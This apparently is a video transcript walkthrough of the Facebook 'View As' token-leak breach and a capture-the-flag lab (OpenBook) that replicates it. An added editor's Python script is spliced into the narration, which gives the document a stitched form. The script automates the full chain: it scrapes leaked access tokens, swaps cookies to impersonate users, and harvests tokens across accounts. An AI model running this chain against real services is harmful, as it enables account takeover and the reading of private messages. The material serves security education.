What's up, everybody? My name is John Hammond, and in this video, I want to showcase a little bit of the Facebook hack that was discovered just last month. I want to discuss a little bit of the vulnerability, what was found, what kind of resulted from it, and then I want to showcase an ICTF or Adversary capture-the-flag challenge that was released to simulate and replicate, honestly, the vulnerability, the hack and the overall attack. So, I'm going to showcase some of the articles and some of the news releases that Facebook released themselves, and if you don't want to see that or you've already read through it, feel free to skip on ahead to the actual code portion of this video, because it will be showcasing some of it. So, on September 28th, Facebook originally released an article discussing a security update as to what they found on their website, infrastructure, system, etc. They found a security issue affecting almost 50 million accounts, my own being one of them. What they discovered was that attackers or hackers had found a vulnerability in Facebook's code that impacted the View As feature, which lets people see what their own profile looks like as another individual or as another user on Facebook. So, they fixed the vulnerability, informed law enforcement, and the articles that they're releasing kind of explain, discuss, and showcase a little bit of what this really, really is. Personally, my own account was logged out of and then logged back in; I personally had to log back in, so I knew that I was affected, and the View As feature has been removed because of this for the time being. The full attack took advantage of about three different and distinct bugs or vulnerabilities that the original attackers and hackers were able to chain together to take advantage of this and at least log into or gain access to other accounts.
So, they discussed the technical details in this original article. They released two articles here first on September 28th, as we've discussed, and this one is peculiar because it explains more of the technical information, or how this attack really happened. So, the initial compromise was the View As feature. It's supposed to be a view-only interface, but one type of functionality, one implementation, allowed you to post stuff to Facebook. Specifically, the version that enables people to wish their friends happy birthday was kind of the golden ticket to actually finding this vulnerability and this bug. The next bug or vulnerability they were able to take advantage of was the video uploader, and that was accidentally offering, just in the plain-text HTML, to the end user actually using this interface, the access token of the Facebook mobile application. So, the access token for any user that may be using the Facebook mobile app, like on your mobile phone, maybe Android or iOS or iPhone, etc. So, essentially, by using their authentication token, they were able to impersonate or become that other user, and that's how they received and were able to take advantage of another person's account. And Facebook is pretty upfront about this. They explained that the access token was literally available within just the HTML of the page. You had to simply view source and then you could track it down. Probably a peculiar thing to find and notice, but just a crucial thing. And honestly, looking at it, you know, in hindsight, what we could do as professional people, infosec and capture-the-flag players, honestly, I think this is something that any one of us could do if you had that motivated attacker mindset. I don't think any of us do because we're not black hat hackers, but it's not like this is an extremely difficult attack or something to pull off. It is something interesting and very, very smart.
So, I wanted to showcase it and maybe just kind of prove to you that this is how it's done. The cool thing about this is that just recently, Adversary, the group and organization that puts on ICTF, which I have other videos for, actually released kind of an attack, or a "mission" as they call it, a module or a training and testing environment to learn how this vulnerability and how this stuff is put together. So I want to showcase this. They include an article with it. Here I have it on this page; it's on their blog. And I think for the time being, it's just going to be on their front page because this happened just very recently. I saw this on Reddit just yesterday. So I want to showcase how it's really done. The article that they released kind of just discusses everything that I've already spoken about, breezing through the other articles that Facebook released themselves. And it showcases that, okay, you can chain these vulnerabilities together, and it's obviously detectable. Facebook discovered this original attack vector through the amount of activity, not so much the number of people, but the use of that View As functionality. And you can see again they discuss the happy birthday functionality there. So their replicated challenge is interesting in that it tries to use this exact same exploit, at least at a high level, right? At a very distilled, watered-down portion of this attack: you can set a birthday for yourself, you can view your account or view your profile as other users, and then you can take advantage of what looks like, I don't think it's a Java web token, but I think it is something close to it, the access token of the other user. So I just wanted to showcase their application called OpenBook. Again, just the training environment to showcase and teach what this vulnerability was and how this attack really happened.
They discuss that this is prevalent in OWASP, or the OpenWeb Association. Oh, I should look this up. I don't want to talk like a fool. Wikipedia says the Open Web Application Security Project is an online community that discusses web application security. So, big thing. Cool. Let's jump into the code and actually showcase this bug in the simulated, distilled replica. So this is OpenBook. Actually, if you were to click on their article, it will bring you to Adversary's interface for it that we've seen in ICTF, and they'll discuss it. They give us the link to view the page on its own, so I've just got to open another tab here. So, OpenBook. It is essentially a fake, boilerplate, social-media-like platform, right? Looks very similar to Facebook, and it's kind of the joke of OpenBook. We are logged in as, supposedly, John Johnson. I don't know those accents. Whatever. Let's ignore them. We have all of these other individuals or friends or users that we could message if we were to click on them. This italics "message" I think is just supposed to be some icon that isn't rendering, but whatever. So again, we click on each of these individuals. We could send a message, but that functionality doesn't seem to really be there. Again, this is just trying to showcase this proof-of-concept thing. If we wanted to, we could post a status, but that feature has been disabled while the possible breach is being investigated. That's perfectly fine. The creators of this module didn't really need to implement that because it's just trying to showcase the vulnerability and the hack. We can see other people's statuses. Very, very interesting. But what we want to do is go check out our own user profile. So I'll click on the little picture of this individual, John Johnson. You can view your profile as any other individual. We want LarkUnderberg. That is kind of the target for this challenge. If I were to view the webpage as him, you can see my URL change just a bit.
It added another GET variable, view as equals one, one being, I suppose, the ID of that account, but nothing has changed because we haven't set our birthday. So you can click on the settings button here and we can specify a birthday. The idea is to change your birthday to the current date. So right now, Wednesday, October 17th for me; if we click on that and hit OK, it will go ahead and enter that as our birthday. If we submit this, now we'll have that new box down here where we can upload a birthday greeting, ideally to ourselves. But if we change the view as and switch to another user, we'll see a different access token in the HTML. So let's actually check out the HTML. You can right-click and hit View Page Source or just hit Control-U. And scroll down through this. A lot of junk, a lot of interesting things, right? But at the very, very bottom here, where we're seeing "upload a birthday greeting", the form action with upload specifies token equals and then this seemingly garbage string; however, we can assume this is a Java web token or whatever the case may be, and that is our unique cookie for our account. That's our individual account. But if we view this as another user, so if I change this to view as LarkUnderberg, now that my URL has changed, we are viewing the page as LarkUnderberg. If I view the source again and scroll down here, you can see that this token is just different from what the other one was. So I can go ahead and copy this if I wanted to. I'm going to use Edit This Cookie. That's the plugin that I've been using in Google Chrome to change this token. And see, if I put them side by side, this token is different from the other because now we're using LarkUnderberg's token. I'll hit the check mark to save it. I will refresh, and now I can see I am LarkUnderberg. Cool. So in the actual attack, the actual real Facebook hack, this wasn't showcasing messages; it was just showcasing message metadata.
And Adversary and the ICTF guys plainly state this: that in the real world it wasn't messages that you were able to take advantage of, but in this case we are. So if you click on one of the individuals that you were chatting with as LarkUnderberg, you can say, hey there, I want to tell you some secrets, and you can get the flag, or the capture-the-flag string of text or token or special key, to denote that you have in fact exploited the vulnerability or taken advantage of it. So if you actually just view this in the source, you can see the flag is "happy birthday mark". So that was cool doing it by hand, but now I want to showcase this in code, right? So let's get to the very, very start. I will remove my cookie and refresh to get back to the original page, so I'm back to being John Johnson. So let's take this URL and let's work with a script that I have. I'm just going to use Python; ape.py will be the name of my script. And let's say the URL can equal what we've pasted in. Let's import requests, because I like to use the requests module. It's just a little bit nicer than urllib in Python. So let's use a session object. I'll just call this s for convenience. And let's do s.get on the URL. Now, once I've made that GET request, I should essentially be working with that page and the cookie should be created for me. So I can say print s.cookies and we'll just see if we've got anything. Yes, we do. We have our token created. So if I wanted to drill down and specify that one, I could index it just like a dictionary here. I want to say the token, and I've got that string. Okay. Now, let's go ahead and make the change to our birthday. So on the web page, we went to the settings page and we changed our birthday to the 17th. I'm going to open up the developer tools, so I'm going to hit F12 just so I can see what this request really is. I'm going to refresh this and set the 17th, hit OK, hit submit. And it looks like this guy here. Can I see the full page of this, please? Cool.
Just had to click it harder, apparently. Looks like it's making a POST request to this link with the birth date being set as simply that string. So that works just fine. Let's go ahead and do that in code. I'll say s.post to this location with the birth date being this as our data. So data can equal a dictionary here, birth date with a string of that text for the current date. And now if we were to get our page, let's just say r equals the response, essentially, for s.get on just this link. And then we can print r.text. Now we should see an upload function, just as we've seen before, because we have the "upload a birthday greeting" segment for that form that we saw as we were doing it in our web browser. So now we can change how we are viewing this page, right? We can say let's get with view as equals one, just as we made that switch when we were actually viewing the page. Well, let me submit here. OK, cool. Yeah, view as equals one, just in our URL. Simple GET variable. So if I print this text now, the token that we're going to see inside the source here is not going to be our token. As we've seen, it will be Lark's token. So let's go ahead and carve that out just with regular expressions. Let's do re.findall token equals as much as we can, probably until an ending quote here. Or I should have done a better job of actually seeing what it was that terminates the token here. Sure. Yeah, let's do the let code one. We'll get the second one. See if we get some find, some find. Sorry, we do. This one is greedy. So let's make this regular expression lazy with the question mark at the end. And I want to actually retrieve this up until an ending quotation mark. Good. So now we can get either of these. Let's just grab the first one. And that is the token that we have now for Lark. So let's say Lark token can equal that, and we will change our s.cookies to actually be that value.
So the best way that we can do that is actually by removing the original token that we have in our set of cookies here. And then let's go ahead and set a new cookie, token, being set to Lark's token. And then we can get the page just as we've done before and just get our own profile. And let's see if we are now LarkUnderberg. Oh, no, I broke something. You might have to keep the user ID in here. Okay, looks like I am viewing now as LarkUnderberg. So our cookie looks like it's in place. Let's see if we can view the messages. I'm just going to grab that URL from the original page here. Five message this individual, user ID equals three here. Let's try that, print r.text. "Hey, are you there? I've got to tell you some secrets," and we can read the flag out just like that. If we wanted to, we can do re.findall flag curly braces, everything inside of it, with just r.text here. Let's print that out and we get the flag. Let's make that lazy. Cool. So that is how we could get the flag. But let's say we wanted to be just like how the real-world Facebook attack was, where we wanted to loop through as many different user accounts as we could and get all of their different tokens. Well, right now I think we only have about a dozen or so user accounts. So let's, I guess, loop through 12 in this case. And in our case it's only setting that view as user with just a simple HTTP GET variable. So it's not going to be a very hardcore, interesting loop. But again, I wanted to showcase that it is something that could be done. Let's go ahead and do that. Let's do for i in, let's say, just range 12. And I do want to keep one here because it's starting at view as one to begin with. And let's say that can be a decimal value and i, so we're just doing some string formatting in Python. Make this an actual loop here. And let's say token can just be that, and let's print out the token that we're receiving. So now I'm seeing a bunch of different tokens; we just scraped them all out.
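Editor's added example, not the video's ape.py and not code from Adversary's OpenBook: a reconstruction of the chain narrated above (first GET to obtain our own token cookie, POST today's birthday, GET with view as another user, scrape the leaked token out of the upload form with a non-greedy regex, swap the cookie, read the target's messages, then loop view as over a range of user IDs). The URL paths, the `birth_date`/`view_as`/`user_id` parameter names, the user IDs, the token strings and the flag are all assumptions, and the `FakeOpenBook` class is a constructed in-process stand-in that reproduces the described behaviour so the chain runs offline; against the live target you would pass a `requests.Session()` instead.

```python
"""Editor-added reconstruction of the View As / birthday-greeting token leak
walkthrough. Paths, parameter names, IDs, tokens and the flag are assumptions."""
import re
from datetime import date
from urllib.parse import parse_qs, urlsplit

try:
    import requests          # only needed against the live target
except ImportError:          # the offline demo below does not need it
    requests = None

TOKEN_RE = re.compile(r'token=(.*?)"')   # non-greedy: a greedy .* merges two tokens
FLAG_RE = re.compile(r'flag\{.*?\}')


def extract_tokens(html):
    """Every access token leaked in the page (the upload form's token= attribute)."""
    return TOKEN_RE.findall(html)


def extract_flag(html):
    m = FLAG_RE.search(html)
    return m.group(0) if m else None


def harvest_tokens(session, base, user_ids):
    """Loop view_as over user IDs and collect the token the birthday form leaks
    for each viewed user: the video's for-i-in-range loop. Returns {id: token}."""
    leaked = {}
    for uid in user_ids:
        r = session.get(base + "/profile", params={"view_as": uid})
        tokens = extract_tokens(r.text)
        if tokens:
            leaked[uid] = tokens[0]
    return leaked


def exploit(session, base, target_id=1, chat_id=3):
    """Set today's birthday -> view_as target -> scrape target's token -> swap our
    cookie for it -> read the target's messages. Returns the flag or None."""
    session.get(base)                                   # creates our own token cookie
    session.post(base + "/settings", data={"birth_date": date.today().isoformat()})
    target_token = harvest_tokens(session, base, [target_id])[target_id]
    session.cookies.clear()                             # drop our own token
    session.cookies.set("token", target_token)          # become the target
    r = session.get(base + "/message", params={"user_id": chat_id})
    return extract_flag(r.text)


class _Resp:
    def __init__(self, text):
        self.text = text


class _Jar(dict):                        # mimics the requests cookie jar calls used above
    def set(self, name, value):
        self[name] = value


class FakeOpenBook:
    """Constructed stand-in for OpenBook (sample data, not the real app): the
    view-as page is supposed to be view-only, but once a birthday matching today
    is set it renders an upload form carrying the *viewed* user's token."""
    USERS = {0: ("JohnJohnson", "tok-john-0000"),
             1: ("LarkUnderberg", "tok-lark-1111"),
             3: ("Mark", "tok-mark-3333")}
    FLAG = "flag{constructed_sample_flag}"

    def __init__(self):
        self.cookies = _Jar()
        self.birthday = None

    def _whoami(self):
        for uid, (_, tok) in self.USERS.items():
            if self.cookies.get("token") == tok:
                return uid
        return None

    def get(self, url, params=None):
        parts = urlsplit(url)
        q = {k: v[0] for k, v in parse_qs(parts.query).items()}
        q.update({k: str(v) for k, v in (params or {}).items()})
        if self._whoami() is None:                      # first visit: log in as John
            self.cookies.set("token", self.USERS[0][1])
        me = self._whoami()
        if parts.path in ("", "/", "/profile"):
            viewed = int(q.get("view_as", me))
            if viewed not in self.USERS:
                return _Resp("<p>no such user</p>")
            html = f"<h1>{self.USERS[viewed][0]}</h1>"
            if self.birthday == date.today().isoformat():   # the leak
                html += f'<form action="/upload?token={self.USERS[viewed][1]}">'
            return _Resp(html)
        if parts.path == "/message":
            if me == 1 and int(q.get("user_id", -1)) == 3:
                return _Resp(f"<p>I've got to tell you some secrets: {self.FLAG}</p>")
            return _Resp("<p>no messages</p>")
        return _Resp("")

    def post(self, url, data=None):
        if urlsplit(url).path == "/settings":
            self.birthday = (data or {}).get("birth_date")
        return _Resp("")


if __name__ == "__main__":
    print(exploit(FakeOpenBook(), "http://openbook.test"))    # offline demo
    # live target: exploit(requests.Session(), "<OpenBook URL>")
```

The fake keeps the defect where the video locates it: the profile page is the only place the token appears, and it shows the token of whoever is being viewed, not of whoever is logged in, so iterating `view_as` is all an attacker needs to harvest every user's token.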
And if we wanted to, we could associate them with another user to scrape out their name. And if we really wanted to, we could impersonate any of those individuals and see their information. For the point of this vulnerability showcase, this replicated, simulated CTF challenge and distilled educational thing, there's not going to be other interesting information. So that's that; that is how you can find the flag for this, and just showcasing how we could take advantage of it to really use that View As functionality and iterate through other user accounts, as many as we wanted to. If this OpenBook application had the functionality to add friends, you could do this for however many friends you wanted to, and then once you've logged into their account, check out their friends, and that's how it fans out. That's how the attack spread to however many million people, and it's become a big, big buzz on Facebook and in the infosec scene. So thank you guys so much for watching. I hope this has been kind of cool and kind of interesting. Hopefully seeing some of the code and seeing how this kind of works with a play-pretend problem to hack on has been kind of cool. And if you like some of this stuff, please do check out some of my other videos; I do a lot like this with a lot of capture-the-flag challenges. Hey, before I go, I do just want to give a quick shout-out and thank you to all the people that support me on Patreon. Thank you guys so much. I cannot say this enough. I know I say it every video, but it's still not enough. You guys are really what keeps me motivated, and it just offers the support to keep me fighting through it and releasing cool stuff and interesting content that hopefully you guys, the world, or the whole Internet can consume. So thank you. One dollar a month on Patreon will give you a special shout-out just like this at the end of every video. I know it's not a whole big crazy incentive.
Hopefully it's just that feel-good feeling like, hey, I'm helping a dude out, you know, just kind of putting food on the table or whatever we're going to do to get by, so thank you for that. $5 or more a month on Patreon will give you early access to every video that is released on YouTube before it goes live. It's access to a special Google Drive folder that is shared with everyone, and that way you can see videos that are scheduled to be released on YouTube maybe a day in advance or whatever the case may be, if I have a lot of content backed up and ready to go soon. Hey, if you did like this video, please do like, comment and subscribe; it really helps me grow. Please do join our Discord server, link in the description. It is a cool community full of other CTF players, programmers and hackers. You can hang out with me and other cool people that are way smarter than me, and it's just a really awesome community to plug yourself into the scene and to learn a little bit, because that's what it's all about: just learning and getting better. Thanks so much, guys. Hope to see you on Patreon. Hope to see you in the next video. I love you. I'll see you later.